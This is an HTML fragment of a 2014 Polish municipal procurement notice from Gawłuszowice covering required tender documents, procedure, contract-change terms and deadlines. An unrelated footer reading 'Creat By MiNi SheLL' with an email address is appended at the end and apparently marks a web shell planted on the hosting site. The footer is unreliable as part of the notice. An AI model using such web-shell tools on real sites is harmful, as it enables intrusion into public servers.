<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)
1)formularz oferty, 
2) oświadczenie Wykonawcy o spełnianiu wymagań stawianych przedsiębiorcom odbierającym odpady komunalne od właścicieli nieruchomości,
3) wykaz usług, które zostaną powierzone podwykonawcom, 
4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawiają dokument, którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego
5) zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeśli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić w następujących przypadkach: 1) działanie siły wyższej; 2) zmniejszenie zakresu przedmiotu zamówienia - w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy w pierwotnym zakresie nie leży w interesie publicznym, czego nie można była przewidzieć w chwili zawarcia umowy - z jednoczesnym zmniejszeniem wynagrodzenia stosownie do pkt 3, przy czym zmniejszenie zakresu przedmiotu zamówienia jest dopuszczalne w granicach uzasadnionego interesu Zamawiającego; 3) zmiana wysokości wynagrodzenia określonego w umowie w związku z okolicznościami wymienionymi w pkt 2; 4) zmiana terminu realizacji zamówienia - gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego, przy czym zmiana terminu w tym przypadku jest dopuszczalna w zakresie uzasadnionego interesu Zamawiającego; 5) zmian przepisów prawnych istotnych dla realizacji przedmiotu umowy, 6) zmiana stawki podatku VAT. Powyższe okoliczności stanowią warunki zmiany umowy, o których mowa w art. 144 ust. 1 PZP w przypadku wystąpienia takiej okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gawluszowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gawłuszowice, 39-307 Gawłuszowice, Gawłuszowice 5A, pok. Nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2014 godzina 09:00, miejsce: Urząd Gminy Gawłuszowice, 39-307 Gawłuszowice, Gawłuszowice 5A, pok. Nr 14. SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie finansowane jest z budżetu Gminy Gawłuszowice..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com